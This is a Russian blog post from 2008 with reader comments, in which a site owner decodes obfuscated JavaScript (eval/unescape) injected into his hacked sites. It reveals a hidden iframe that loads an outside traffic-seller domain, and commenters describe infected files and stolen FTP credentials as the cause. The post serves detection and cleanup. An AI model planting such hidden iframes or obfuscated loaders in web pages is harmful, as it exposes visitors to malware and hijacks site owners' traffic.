Познавательный блог Мобильная врсия

Страницы

Промо

Чертовы барыги и их IFRAME трафик.

Чертовы барыги и их IFRAME трафик. Сегодня обнаружил, что на нескольких сайтах вылетают ошибки с сессиями и постоянно грузится какой-то левый сайт orentraff.cn.

Не долго ковырявшись в коде страниц обнаружил странный код:

<script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74."));
</script>

Спросил у другана что за команды eval и unescape. eval - Выполняет код, а unescape - конвертирует символы.

Заменив функцию EVAL на document.write. И открыв это в html документе я увидел еще один зашифрованный текст.

document.write('\u003c\u0069\u0066\u0072\u0061.');

Поковырявшись по форумам нашел топик, где парень столкнулся с той же проблемой, что я и. Оказалось \u003c это код символа в юникоде или в asci.

Затем я открыл этот гнусный код заменив в нем document.write на alert. И получил окошко сообщением, в котором и была волшебная строчка.

<iframe src="https://orentraff.cn/in.cgi?13" style="display:none"></iframe>

Гнусявый IFRAME. Судя по всему поломали один из моих сайтов и залили это добро кругом. Благо успел быстро вычистить и удалит бажный скрипт. Так что будьте аккуратны, следите за безопасностью своих сайтов. Иначе вас превратят в рассадник вирусов и копрофильской порнухи.

Комментарии

Комментарий от Анатолий [ 12 мая, 2008, 10:52 ]

ТОлько что вот вычистил свой сайт от этой шняги…вопрос..как она там оказалась?

Комментарий от kas [ 12 мая, 2008, 13:24 ]

Сайт поимели и залили этот iframe. Там целый бизнес.

Комментарий от vova [ 10 июля, 2008, 09:01 ]

как вы все это удалили быстро и везде?)
или в каждом файле просто строчку потереть?

Комментарий от kas [ 10 июля, 2008, 15:00 ]

Они записывают этот код в какой-то один файл дивжка. Ищи в какой именно, у меня заражали конфиг.пхп

Комментарий от Ленар [ 16 июля, 2008, 12:49 ]

У нас корпоративный сайт хакнули так. Причем на хостинге стояла платежная система, мы испугались, вдруг платежку хотели хакнуть, оказалось торговцы трафиком :)

Комментарий от валерий [ 9 октября, 2008, 10:31 ]

добрый день! тоже попал на данный скрипт! после нескольких удалений, скрипт исчез, но появился другой — google-analistic. прописываться в файлах темы. чищу каждый ден, но не прет. а вы окончательно избавились от проблемы?! если не сложно, ответье на мыло

Комментарий от BREND [ 12 декабря, 2008, 15:31 ]

Я только что удалил эту поганку с сайта.

Писался в файлы index.html, index.php, login.html в виде document.write(unescape(

Комментарий от TiamatInc [ 26 февраля, 2009, 13:56 ]

Меня этот iFrame трафик тоже уже достал. Мой сайт не взламывали, но в Инете столько горе-мастеров которые думают, что если на свои сайт поставить код подобных партнёрк, то можно много денег заработать. То страница по полчаса грузится, то вирусы лезут, то левые сайты рушат этот их невидимый фрейм и открываются в полный рост… Вот неужели люди думают, что копейки заработанные с такого трафика окупят потерю посетителей

Комментарий от фыв [ 11 апреля, 2009, 20:59 ]

Всё это — результат того, что вы сохраняете логин и пароль в ваших фтп-клиентах. ПРАВИЛЬНО ТАК:
в Total commandere, например, хранить действительный логин и вымышленный пароль. Если вирус попадёт на ваш рабочий комп, то даже будучи заблокирован, он успевает отослать на сервер украденные пароли, логины и фтп-адреса (те что вы сохраняли в винде). А потом в любой момент программа-робот начнёт обходить все эти сайты по фтп и если логин-пароль подходит — все файлы index,main,login будут перезаписаны с включением iframe. Единственный способ — сменить пароль, а иначе бот будет ходить по кругу и переписывать файлы снова и снова.

Комментарий от Хакнутый Хакер [ 9 ноября, 2010, 22:30 ]

Помогите!!! Я нече не могу сделать!!!
1)У меня стоит аутпост (файрвол такой)… с пирацкой лицензией:-)
2)При гулянии на просторах интернета при запуске любово сайта в штуке где показывается адрес откудова грузится страница всегда есть сайт megaaploadzz.com
Снифил скачаные файлы, отправлял на вирустотал — результат 0, все чисто…
3)В системе вроде вирусы не наблюдаются (Есть Аваст! 5 бесплатный и Антивирус от мелкомягких)…
4)Появилось около года назад…
5)Использую оперу:)

Комментарий от Хакнутый Хакер [ 9 ноября, 2010, 22:32 ]

Fail
Сайт megauploadzz.com — вроде файлообменик на первый взгляд…

Написать комментарий








Поиск по сайту

Промо

Статистика

Мета

  Разработка и дизайн — StvPromo.ru